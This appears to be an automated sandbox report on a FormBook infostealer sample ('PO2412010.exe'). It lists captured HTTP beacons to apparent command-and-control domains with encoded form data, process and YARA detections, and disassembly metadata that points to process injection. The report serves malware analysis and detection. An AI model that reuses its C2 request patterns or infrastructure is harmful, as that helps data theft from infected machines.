                                                                      Content-Length: 1232
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.beyondfitness.live/fbpt/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q= [TRUNCATED]
                                                                      Dec 10, 2024 15:17:44.840209961 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Tue, 10 Dec 2024 14:17:44 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      36 | 192.168.2.11 | 49748 | 209.74.77.107 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:17:46.289422035 CET | 364 | OUT | GET /fbpt/?x2q=sHQWWiJRbY7Czg+pdBTXnWo2YpYQcCCmWGf9ZvbaXe6zmK6gq2rUy+H9V8T+CpeiS8UyZN5qWlRSJl8kNjqwsClZu7js/9F2ASp2jrUizXePexmAjexZLZ0=&Gn6D=5fNLN8qhqB3P HTTP/1.1
                                                                      Host: www.beyondfitness.live
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:17:47.511436939 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Tue, 10 Dec 2024 14:17:47 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      37 | 192.168.2.11 | 49749 | 77.68.64.45 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:17:53.190988064 CET | 635 | OUT | POST /dm4p/ HTTP/1.1
                                                                      Host: www.dietcoffee.online
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.dietcoffee.online
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.dietcoffee.online/dm4p/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q=qCODU1Ebwnhg6TSnaVpSJhz1mHFgjrvu6lafUU+g0DgZhSmQlMDnJ632oP/6dfaoRn0P6viKy/Mq3W0ChEgnxELsrdt8D35QJICg8M5rafX50rmoOMERc3ir+C0mm86wi99ZUK27w9RJNfIWxY8OEFPUF4Gs/o/Trm1aFYMp/Jhrart56aH32Eb+ualPEe1gHg==
                                                                      Dec 10, 2024 15:17:54.418369055 CET | 391 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.25.3
                                                                      Date: Tue, 10 Dec 2024 14:17:54 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Content-Encoding: gzip


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      38 | 192.168.2.11 | 49750 | 77.68.64.45 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:17:55.856019020 CET | 655 | OUT | POST /dm4p/ HTTP/1.1
                                                                      Host: www.dietcoffee.online
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.dietcoffee.online
                                                                      Content-Length: 220
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.dietcoffee.online/dm4p/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q=qCODU1Ebwnhg4zinJmRSIBz273FgoLvi6lWfUV6w0QUZmxyQ39DnI632gv/7Q/avRn4p6rqKy+oq3TYCizMkxUL5qttyMX5QJICg8Io8afP51b2oOtEQf3is2i0m3s6Oi993UJzuw/pJNf4WyKEJTVPoB4HF+42rsEU3CL5erq1Mbtgjq5Og1XT868E/NvQpctPI16Y9jTppVI9hL4jZ4LQ=
                                                                      Dec 10, 2024 15:17:57.098282099 CET | 391 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.25.3
                                                                      Date: Tue, 10 Dec 2024 14:17:57 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Content-Encoding: gzip


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      39 | 192.168.2.11 | 49751 | 77.68.64.45 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:17:58.527914047 CET | 1668 | OUT | POST /dm4p/ HTTP/1.1
                                                                      Host: www.dietcoffee.online
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.dietcoffee.online
                                                                      Content-Length: 1232
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.dietcoffee.online/dm4p/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:17:59.820360899 CET | 391 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.25.3
                                                                      Date: Tue, 10 Dec 2024 14:17:59 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Content-Encoding: gzip


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      40 | 192.168.2.11 | 49752 | 77.68.64.45 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:18:01.195872068 CET | 363 | OUT | GET /dm4p/?Gn6D=5fNLN8qhqB3P&x2q=nAmjXBwFyC120iWFa15+GTz1nnoe6LyW/X6vA0SQviJnmQOR7pbzII6Li/fXSuLSC3cdwp3L3c1awzkuuw4AiTCMhthfFHlaAoSHmNs0Z/b09PqcCq4Db34= HTTP/1.1
                                                                      Host: www.dietcoffee.online
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:18:02.419389963 CET | 373 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.25.3
                                                                      Date: Tue, 10 Dec 2024 14:18:02 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dm4p/ was not found on this server.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      41 | 192.168.2.11 | 49753 | 146.88.233.115 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:18:09.057461023 CET | 635 | OUT | POST /qtfx/ HTTP/1.1
                                                                      Host: www.smartcongress.net
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.smartcongress.net
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.smartcongress.net/qtfx/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q=HflE8l++v44HtKQzz5+/zGKTzyiXaCjV6BJMpsDV0Mm1smFq8jmIkJJtYDjGMX6rqs2wCrZVWppBwohjxoOvH06efju3JE9hOW5pf9Emi1dH2VOll9VqgjXRrcXqdv2stKl0vl2gWC5rbpCRYk35Oj+5EH54OI844KY5Yf0ma3KGPSJNXyaqmPNLKFa/XrZ+6A==


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      42 | 192.168.2.11 | 49754 | 146.88.233.115 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:18:11.719854116 CET | 655 | OUT | POST /qtfx/ HTTP/1.1
                                                                      Host: www.smartcongress.net
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.smartcongress.net
                                                                      Content-Length: 220
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.smartcongress.net/qtfx/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q=HflE8l++v44H/7gz0eS/ymKS/SiXNSic6B1MpoSK0+y1tH1q/mSInJJtQjiCTH6aqsqOCrlVWp9BwpRjyfSsdE6QSDuiWU9hOW5pf9hui2tH2EeljpBtpDXS9MXqZv2gtKlCvnTHWE9rbpyRb134ZT+/a34nOKtOj4RpbMdXS0SZOUEXHRT9lcFJej7Pea83hDsni2rGc7NnwR9p9avm8GM=
                                                                      Dec 10, 2024 15:18:12.988253117 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                      content-type: text/html; charset=iso-8859-1
                                                                      content-length: 196
                                                                      date: Tue, 10 Dec 2024 14:18:12 GMT
                                                                      server: LiteSpeed
                                                                      x-tuned-by: N0C
                                                                      connection: close
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      43 | 192.168.2.11 | 49755 | 146.88.233.115 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:18:14.392503023 CET | 1668 | OUT | POST /qtfx/ HTTP/1.1
                                                                      Host: www.smartcongress.net
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.smartcongress.net
                                                                      Content-Length: 1232
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.smartcongress.net/qtfx/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:18:15.652673006 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                      content-type: text/html; charset=iso-8859-1
                                                                      content-length: 196
                                                                      date: Tue, 10 Dec 2024 14:18:15 GMT
                                                                      server: LiteSpeed
                                                                      x-tuned-by: N0C
                                                                      connection: close
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      44 | 192.168.2.11 | 49756 | 146.88.233.115 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:18:17.054034948 CET | 363 | OUT | GET /qtfx/?x2q=KdNk/QG/ntQJ0Ylui7yy1ELkvwiUPibsxCMWqIa/89W9m0NHjjmW45E2UxezVHfL5+2nDpZVQ4VEoa9MycOLbzmLeHv/c15PEmolRusqu0oXm0K1+tUNhxI=&Gn6D=5fNLN8qhqB3P HTTP/1.1
                                                                      Host: www.smartcongress.net
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:18:18.365518093 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                      content-type: text/html; charset=iso-8859-1
                                                                      content-length: 196
                                                                      date: Tue, 10 Dec 2024 14:18:18 GMT
                                                                      server: LiteSpeed
                                                                      x-tuned-by: N0C
                                                                      connection: close
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                      Target ID:0
                                                                      Start time:09:14:17
                                                                      Start date:10/12/2024
                                                                      Path:C:\Users\user\Desktop\PO2412010.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\PO2412010.exe"
                                                                      Imagebase:0x1e0000
                                                                      File size:877'568 bytes
                                                                      MD5 hash:60ABE4A88D6C409A3A4770CEF13C0222
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:09:14:21
                                                                      Start date:10/12/2024
                                                                      Path:C:\Users\user\Desktop\PO2412010.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\PO2412010.exe"
                                                                      Imagebase:0xfb0000
                                                                      File size:877'568 bytes
                                                                      MD5 hash:60ABE4A88D6C409A3A4770CEF13C0222
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1811863251.0000000001980000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1813283788.0000000001F90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:09:14:53
                                                                      Start date:10/12/2024
                                                                      Path:C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe"
                                                                      Imagebase:0x3a0000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:6
                                                                      Start time:09:14:54
                                                                      Start date:10/12/2024
                                                                      Path:C:\Windows\SysWOW64\isoburn.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\isoburn.exe"
                                                                      Imagebase:0x2f0000
                                                                      File size:107'008 bytes
                                                                      MD5 hash:BF19DD525C7D23CAFC086E9CCB9C06C6
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3828928814.0000000002620000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3835997745.00000000043F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3835510963.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      Target ID:9
                                                                      Start time:09:15:07
                                                                      Start date:10/12/2024
                                                                      Path:C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe"
                                                                      Imagebase:0x3a0000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3838073640.00000000058D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:11
                                                                      Start time:09:15:20
                                                                      Start date:10/12/2024
                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                      Imagebase:0x7ff6de060000
                                                                      File size:676'768 bytes
                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                        Execution Graph

                                                                        Execution Coverage:10.2%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:169
                                                                        Total number of Limit Nodes:9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1441059113.0000000008C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8c10000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (o_q$4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$4|dq$4|dq$$_q
                                                                        • API String ID: 0-1079538806
                                                                        • Opcode ID: b99c7108a105d8e901c09be67af741d25acfe14c9657c51b1019c02e2f8ac02f
                                                                        • Instruction ID: a5dc5d1bf3823e35379290047d7e13ea2d6d67f61a3b00f36643456f82965949
                                                                        • Opcode Fuzzy Hash: b99c7108a105d8e901c09be67af741d25acfe14c9657c51b1019c02e2f8ac02f
                                                                        • Instruction Fuzzy Hash: D843E474A00219CFCB24DF28C9C8A9DB7B2BF89311F158599E419AB365DB31ED82DF50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1441059113.0000000008C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8c10000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (o_q$(o_q$,cq$,cq$Hcq
                                                                        • API String ID: 0-4110691418
                                                                        • Opcode ID: 874752f1dbd3fb3c9b40a2c6e577e3210923e80ebfca25bbb4cfc5f977bbf498
                                                                        • Instruction ID: 1826839be507497b2e5b3d9dfceb6186e6b8bc70ba59b2c25ce648c90b114834
                                                                        • Opcode Fuzzy Hash: 874752f1dbd3fb3c9b40a2c6e577e3210923e80ebfca25bbb4cfc5f977bbf498
                                                                        • Instruction Fuzzy Hash: 4E528C34B00255DFCF08DF79C488A6EBBB2BF89315B158169E8069B364DB35ED42DB90

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1431880273.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `Ybl$t^bl
                                                                        • API String ID: 0-921532137
                                                                        • Opcode ID: 10029c38e9d1c90f25662bdec9e6b7b6b28a710126821e8a325e6cb3bdeb1f51
                                                                        • Instruction ID: 9c9d605bf77a1e1fe5f1dba4669adf4294c592a3bb13d55c76cd969b7e50fae6
                                                                        • Opcode Fuzzy Hash: 10029c38e9d1c90f25662bdec9e6b7b6b28a710126821e8a325e6cb3bdeb1f51
                                                                        • Instruction Fuzzy Hash: CC81C474E00209DFDB08DFA9D994AEEBBB2FF88300F108529E419AB369DB355945CF51

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1431880273.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `Ybl$t^bl
                                                                        • API String ID: 0-921532137
                                                                        • Opcode ID: 56f5da104a88c564f8dbbd615db7d9053e1a67183a9960cb1c38b544a8701d28
                                                                        • Instruction ID: e1f4250d3000d542dc08848269beea8570107b82b4790c59f8e5417813c24dcf
                                                                        • Opcode Fuzzy Hash: 56f5da104a88c564f8dbbd615db7d9053e1a67183a9960cb1c38b544a8701d28
                                                                        • Instruction Fuzzy Hash: 8E51D670E012099FDB18DFA9D991ADEBBB2FF88300F10852AE415AB369DB345906CF51

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1441059113.0000000008C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8c10000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: d
                                                                        • API String ID: 0-2564639436
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1441059113.0000000008C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8c10000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Hcq$Hcq$Hcq
                                                                        • API String ID: 0-687564024

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1439007633.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6f90000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8cq$8cq$8cq
                                                                        • API String ID: 0-1458523781

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1439007633.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6f90000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8$$_q$$_q
                                                                        • API String ID: 0-336898379

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 072E546E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID: U
                                                                        • API String ID: 983334009-3372436214

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1439007633.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6f90000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (cq$Hcq
                                                                        • API String ID: 0-4250889185

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1439007633.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6f90000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Te_q$Te_q
                                                                        • API String ID: 0-1615656442

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1439007633.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6f90000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8cq$8cq
                                                                        • API String ID: 0-1115341050

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1439007633.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6f90000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $_q$$_q
                                                                        • API String ID: 0-458585787

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 072E5E7E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
